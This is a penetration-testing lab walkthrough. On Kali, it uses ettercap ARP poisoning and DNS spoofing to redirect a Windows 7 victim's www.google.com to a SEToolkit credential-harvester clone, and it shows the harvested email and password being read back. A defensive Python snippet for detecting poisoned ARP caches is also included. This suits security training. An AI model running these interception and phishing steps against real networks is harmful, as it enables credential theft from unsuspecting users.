Metasploit 20. DNS + ARP Spoofing + Fake Web Site

***************************************************************************************

[Lab] Fake Site Setup (time limit: 30)

 

DNS Spoofing/ARP Spoofing : ettercap

+

Fake Web Site : SEToolkit (Lab 2)

+

Sending text messages/e-mail : SEToolkit

 

(Lab systems)

Victim system : Windows 7 (192.168.20.202)

Attack system : Kali Linux (192.168.20.50)

Router : firewall.example.com (192.168.20.100)

 

(Windows 7 system) Check the result

http://www.google.com -> http://192.168.20.50/ (malicious code)

***************************************************************************************

ARP/DNS spoofing of the firewall and Windows 7 using ettercap

Fake web site setup using setoolkit, and ID/password collection test


<Kali Linux>


Preliminary check

# echo 1 > /proc/sys/net/ipv4/ip_forward

# cat /proc/sys/net/ipv4/ip_forward

1


# vi /etc/ettercap/etter.dns

www.google.com    A 192.168.20.50

www.google.com    PTR 192.168.20.50


Run ettercap

# ettercap -G &

Sniff -> Unified sniffing -> Network Interface : eth1

Hosts -> Scan for hosts

Hosts -> Host List 

192.168.20.100 -> Add to Target 1

192.168.20.202 -> Add to Target 2

Mitm -> ARP poisoning -> Sniff remote connections

Plugins -> Manage the plugins -> dns_spoof

Start -> Start sniffing


Fake web site setup

# setoolkit

Social-Engineering Attacks

Website Attack Vectors

Credential Harvester Attack Method

Web Templates

set:webattack > 1

.... > 192.168.20.50

Google

<ENTER>

exit


# cd /var/www/html ; ls


<Windows 7>

firefox -> connect to http://www.google.com and log in (Fake Site)


<Kali Linux>

# cd /var/www/html ; ls

# cat harvester_*.txt | egrep '(Email|Passwd)'

[Email] abc@test.com

[Passwd] abc123
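
Added example (not part of the original lab notes): on the Windows 7 side, the ARP poisoning shows up as the router IP sharing a MAC address with another host in the `arp -a` cache, and the DNS spoofing as a public name answering with a private address. The sample ARP output, the MAC addresses, and the internal-name suffix list are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output after the router entry has
# been poisoned; the MAC addresses are made up for illustration.
SAMPLE_ARP = """\
Interface: 192.168.20.202 --- 0xb
  Internet Address      Physical Address      Type
  192.168.20.50         00-0c-29-aa-bb-cc     dynamic
  192.168.20.100        00-0c-29-aa-bb-cc     dynamic
  192.168.20.255        ff-ff-ff-ff-ff-ff     static
"""

ARP_ROW = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)", re.I | re.M)


def parse_arp(text):
    """Return {ip: mac} for the dynamic entries of `arp -a` output."""
    table = {}
    for ip, mac, kind in ARP_ROW.findall(text):
        if kind.lower() == "dynamic":  # skip static broadcast/multicast rows
            table[ip] = mac.lower()
    return table


def shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_poisoned(table, gateway):
    """True when the gateway's MAC is also claimed by another host."""
    return table.get(gateway) in shared_macs(table)


def suspicious_answer(hostname, address):
    """True when a public-looking name resolves into private/loopback space."""
    internal = hostname.endswith((".local", ".lan", ".internal")) or "." not in hostname
    ip = ipaddress.ip_address(address)
    return not internal and (ip.is_private or ip.is_loopback)


if __name__ == "__main__":
    arp = parse_arp(SAMPLE_ARP)
    print(shared_macs(arp), gateway_poisoned(arp, "192.168.20.100"))
```

A static ARP entry for the router on the client, or dynamic ARP inspection on the switch, prevents the cache entry from being overwritten in the first place.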




***************************************************************************************

[Lab] Fake Site Setup 2 (time limit: 30)

DNS Spoofing/ARP Spoofing : ettercap

+

Fake Web Site : BeEF (set up manually)

 

(Lab systems)

Victim system : Windows 7 (192.168.20.202)

Attack system : Kali Linux (192.168.20.50)

Router : firewall.example.com (192.168.20.100)

 

(Windows 7 system) Check the result

http://www.adobe.com -> http://192.168.20.50/ (malicious code)

***************************************************************************************